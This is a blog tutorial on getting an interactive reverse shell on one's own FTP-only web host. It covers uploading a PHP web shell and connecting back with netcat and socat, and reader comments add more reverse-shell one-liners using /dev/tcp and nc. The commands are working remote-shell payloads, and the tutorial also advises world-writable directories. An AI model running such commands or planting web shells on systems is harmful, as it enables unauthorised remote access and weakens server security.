Sometimes you purchase a web host and the only thing you have to control it, is an ftp account. For those familiar with unix-like shells, it would be really cool to have an SSH session on your account, but most of web hosts don’t allow this option. It makes the life much easier for maintaining the files and permissions.

First step is to investigate whether your php service bans the functions to execute a process or not. I’m talking about the exec and system and popen function series. You may write your own test or install a php script called “PHP Shell”. PHP Shell receives the shell commands through the web browser and executes them and finally delivers the output right at the browser window. There are lots of php shells out there. I used this one developed by Martin Geisler. Download one of them and upload it using your ftp account.

For simple operations, you can get an interactive shell using GNU netcat (Note the GNU word, there are lots of other versions and most of them do not support executing commands). If you run the following command on your machine, it would create a simple tcp listener on an specific port :

netcat -l -p 8999 -v

As you see, we have provided the verbose option to get notified when some one connects to your listener. Then by running the following line, we can the simply connect from the phpshell to our local listener and receive a shell :

netcat my.pc.ip.address 8999 -e “/bin/bash -i”

The above netcat command will connect to your pc at home and execute an interactive bash shell. At this stage you have a command and see the resulting shell (i call it semi interactive). Soon you’ll notice that special terminal commands such as Ctrl+D, Ctrl+C and arrow keys don’t work as expected.

We’ll use socat to overcome this problem. socat can connect almost every two streams you find in the world. From files to sockets, Terminals to udp connections, process output to tcp connection and it supports SSL connections too. But it is not installed on most distributions by default. So the first step is to get the source and compile it. We need it both on our local pc and on the web server. Well, the pc part is easy, but for the web server side you should first find out that whether the build tools (compiler, make, etc) are installed on the web server or not. Test it simply by running g++ and make in your php shell. If yes, you’re all set and follow these steps to get it running :

  1. run wget
  2. extract the file using tar -xf socat-
  3. cd socat-1.7.13
  4. ./configure
  5. make

if everything went smoothly and fine, you would have the socat binary right under the socat-1.7.13 folder. Note that if your web host doesn’t have the build tools installed, you should compile the package locally and upload the binary file. The final part is to setup the listener, this time using socat and connect to it from the webhost, run the following command to get the listener :

socat file:`tty`,raw,echo=0 tcp-listen:8999

and run this one from the php-shell to get the terminal.

./socat tcp-connect:my.pc.ip.address:80 exec:’bash -li’,pty,stderr,setsid,sigint,sane

The first socat command, connected a tcp socket (which is yet listening) to your current TTY and second one, connects the bash process to your tcp listener. Now, you have a fully functional TTY Terminal connected to your account in the web-host. Almost all terminal commands work and you can run vim, nano, screen and Midnight commander 😎 . There are few differences between an SSH session and this reverse shell. The most  important ones are :

  1. Your session is not encrypted, you may use SSL capabilities of socat
  2. SSH automatically forwards some of useful shell variables, you may set them your self or put them in the .bash_profile or .bash_rc of the web hosting account, such as
    export TERM=”xterm-color”
  • For simplicity purposes, you may put the second socat command line in a new php script to avoid using php shell each time. Note that you should either secure your php shell or delete it when everything finished to avoid others, access your account.
  • Some web servers run using a different user id than your current account. It would cause that you don’t have permission to create and edit files using the php shell. In such situations, creating a world wide writable directory (Enable All Permissions for All) would do the job.

Tags: , ,

7 Responses to “Get Your Interactive Reverse Shell on a Webhost”

  1. AbiusX Says:

    nice blog btw dude

  2. zero?yuki Says:

    nice tutorial, but some things are missing

  3. [Pentesting] Établir un reverse-shell en une ligne Says:

    […] Blog […]

  4. digital options Says:

    I have been exploring for a bit for any high-quality articles or weblog posts on this kind of area . Exploring in Yahoo I finally stumbled upon this site. Reading this information So i am happy to exhibit that I’ve an incredibly good uncanny feeling I found out just what I needed. I such a lot no doubt will make certain to don?t fail to remember this site and give it a look on a continuing basis.

  5. anon Says:

    I don’t normally comment on these, but… Thank you.

  6. reptar Says:

    who even still has a netcat with the -e option?

    here’s some reverse shell one-liners from my collection:

    bash -c ‘exec 3/dev/tcp/$YOUR_IP/$PORT; bash &1 >&3 &’
    mkfifo /tmp/pipe; nc /tmp/pipe &

  7. reptar Says:

    wow, ignore the above, a lot of it got filtered out by your comment sanitizer (probably looked like HTML)

    I’ll try them again, replace the } with > and the { with< for them to work

    bash -c 'exec 3{}/dev/tcp/$YOUR_IP_PORT; bash {&3 2}&1 }&3 &
    mkfifo /tmp/pipe; nc $YOUR_IP $PORT { /tmp/pipe | /bin/sh } /tmp/pipe &

Leave a Reply